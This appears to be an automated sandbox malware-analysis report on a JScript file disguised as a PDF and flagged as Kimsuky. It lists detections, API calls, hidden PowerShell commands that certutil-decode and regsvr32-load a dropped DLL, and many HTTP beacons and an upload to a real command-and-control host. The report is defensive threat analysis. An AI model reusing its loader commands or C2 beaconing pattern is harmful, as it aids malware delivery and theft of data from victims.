Process Memory Space: regsvr32.exe PID: 2052	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x178ad:$a1: certutil -decode 0x17a46:$a1: certutil -decode
Click to see the 46 entries

Unpacked PEs

Source	Rule	Description	Author
24.2.regsvr32.exe.7ff983d00000.1.unpack	JoeSecurity_Kimsuky	Yara detected Kimsuky	Joe Security
13.2.regsvr32.exe.7ff983d90000.1.unpack	JoeSecurity_Kimsuky	Yara detected Kimsuky	Joe Security
19.2.regsvr32.exe.7ff983d00000.1.unpack	JoeSecurity_Kimsuky	Yara detected Kimsuky	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for domain / URL

Show sources

Source: texts.letterpaper.press

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll	Metadefender: Detection: 29%	Perma Link
Source: C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll	ReversingLabs: Detection: 67%
Source: C:\ProgramData\glK7UwV.pR9a	Metadefender: Detection: 29%	Perma Link
Source: C:\ProgramData\glK7UwV.pR9a	ReversingLabs: Detection: 67%

Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D989D0 CryptAcquireContextW,CryptGenRandom,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptAcquireContextW,CryptImportKey,CryptEncrypt,CryptReleaseContext,_fread_nolock,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	13_2_00007FF983D989D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DE3028 CryptImportKey,SetEndOfFile,RtlSizeHeap,GetProcessHeap,SetEnvironmentVariableW,	13_2_00007FF983DE3028
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DE3030 CryptEncrypt,SetEndOfFile,RtlSizeHeap,GetProcessHeap,SetEnvironmentVariableW,	13_2_00007FF983DE3030
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D98D10 _fread_nolock,_fread_nolock,CryptAcquireContextW,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,_fread_nolock,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,	13_2_00007FF983D98D10
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D089D0 CryptAcquireContextW,CryptGenRandom,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptAcquireContextW,CryptImportKey,CryptEncrypt,CryptReleaseContext,_fread_nolock,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	19_2_00007FF983D089D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D53028 CryptImportKey,	19_2_00007FF983D53028
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D53030 CryptEncrypt,	19_2_00007FF983D53030
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D08D10 _fread_nolock,_fread_nolock,CryptAcquireContextW,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,_fread_nolock,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,	19_2_00007FF983D08D10

Source: C:\Windows\System32\regsvr32.exe	File opened: z:
Source: C:\Windows\System32\regsvr32.exe	File opened: x:
Source: C:\Windows\System32\regsvr32.exe	File opened: v:
Source: C:\Windows\System32\regsvr32.exe	File opened: t:
Source: C:\Windows\System32\regsvr32.exe	File opened: r:
Source: C:\Windows\System32\regsvr32.exe	File opened: p:
Source: C:\Windows\System32\regsvr32.exe	File opened: n:
Source: C:\Windows\System32\regsvr32.exe	File opened: l:
Source: C:\Windows\System32\regsvr32.exe	File opened: j:
Source: C:\Windows\System32\regsvr32.exe	File opened: h:
Source: C:\Windows\System32\regsvr32.exe	File opened: f:
Source: C:\Windows\System32\regsvr32.exe	File opened: d:
Source: C:\Windows\System32\regsvr32.exe	File opened: b:
Source: C:\Windows\System32\regsvr32.exe	File opened: y:
Source: C:\Windows\System32\regsvr32.exe	File opened: w:
Source: C:\Windows\System32\regsvr32.exe	File opened: u:
Source: C:\Windows\System32\regsvr32.exe	File opened: s:
Source: C:\Windows\System32\regsvr32.exe	File opened: q:
Source: C:\Windows\System32\regsvr32.exe	File opened: o:
Source: C:\Windows\System32\regsvr32.exe	File opened: m:
Source: C:\Windows\System32\regsvr32.exe	File opened: k:
Source: C:\Windows\System32\regsvr32.exe	File opened: i:
Source: C:\Windows\System32\regsvr32.exe	File opened: g:
Source: C:\Windows\System32\regsvr32.exe	File opened: e:
Source: C:\Windows\System32\regsvr32.exe	File opened: c:
Source: C:\Windows\System32\regsvr32.exe	File opened: a:

Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DE3188 FindFirstFileW,	13_2_00007FF983DE3188
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB66E0 FindFirstFileW,FindNextFileW,WideCharToMultiByte,GetLastError,FindClose,FindClose,	13_2_00007FF983DB66E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DD84FC FindFirstFileExW,	13_2_00007FF983DD84FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB6BB0 FindFirstFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	13_2_00007FF983DB6BB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D53188 FindFirstFileW,	19_2_00007FF983D53188
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D266E0 FindFirstFileW,FindNextFileW,WideCharToMultiByte,GetLastError,FindClose,FindClose,	19_2_00007FF983D266E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D484FC FindFirstFileExW,	19_2_00007FF983D484FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D26BB0 FindFirstFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	19_2_00007FF983D26BB0

Software Vulnerabilities:

JavaScript source code contains functionality to generate code involving a shell, file or stream

Show sources

Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse	Argument value : ['"powershell.exe -windowstyle hidden certutil -decode C:\\Windows\\..\\ProgramData\\efVo8cq.sIhn C:\\Windo']	Go to definition
Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse	Argument value : ['"powershell.exe -windowstyle hidden regsvr32.exe /s C:\\Windows\\..\\ProgramData\\glK7UwV.pR9a",0,true', '"powershell.exe -windowstyle hidden certutil -decode C:\\Windows\\..\\ProgramData\\efVo8cq.sIhn C:\\Windo']	Go to definition
Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse	Argument value : ['"powershell.exe -windowstyle hidden regsvr32.exe /s C:\\Windows\\..\\ProgramData\\glK7UwV.pR9a",0,true', '"Scripting.FileSystemObject"', '"powershell.exe -windowstyle hidden certutil -decode C:\\Windows\\..\\ProgramData\\efVo8cq.sIhn C:\\Windo']	Go to definition

Source: Joe Sandbox View

ASN Name: AMAZON-AESUS AMAZON-AESUS

Source: Joe Sandbox View	IP Address: 50.17.5.224 50.17.5.224
Source: Joe Sandbox View	IP Address: 50.17.5.224 50.17.5.224

Source: global traffic	HTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=b&p1=8ace1190&p2=c HTTP/1.1Content-Type: multipart/form-data; boundary=--7263b57d61acd27d98a454fc484795fe0106d5Content-Length: 45838User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache

Source: powershell.exe, 00000004.00000002.454312297.0000022E38F9E000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.519223308.000001ACA52BD000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.452083262.0000022E20FB9000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.496611128.000001AC8D2AF000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69%
Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.694
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.695
Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69;
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69C
Source: regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69G
Source: regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69L
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69M
Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69O
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69T
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69U
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69W
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Y
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69e
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69i
Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69k
Source: regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69n
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69o
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69pBm
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69q
Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69u
Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69z
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=c
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=cf
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190%
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190&
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace11902
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace11902M)
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace11906
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190?
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190B
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190I
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190J
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190K
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190K8(
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190KP7
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190N
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190SL
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190V
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190b
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190b$(
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190b7
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190bK
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190bK6(
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190db
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190db;M
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190dbVM5
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190dbXM
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190dbyLb
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190k
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190p2=c
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190sMh
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190w
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190w(:
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190z
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190#
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190#~
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190$
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190&M
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190(z
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190)M
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190)t
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190-(
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190.
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190/
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11901t
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11903
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace119037
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11904
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11904&2qt
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11904N
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11905C
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11905t
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp	String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11906L
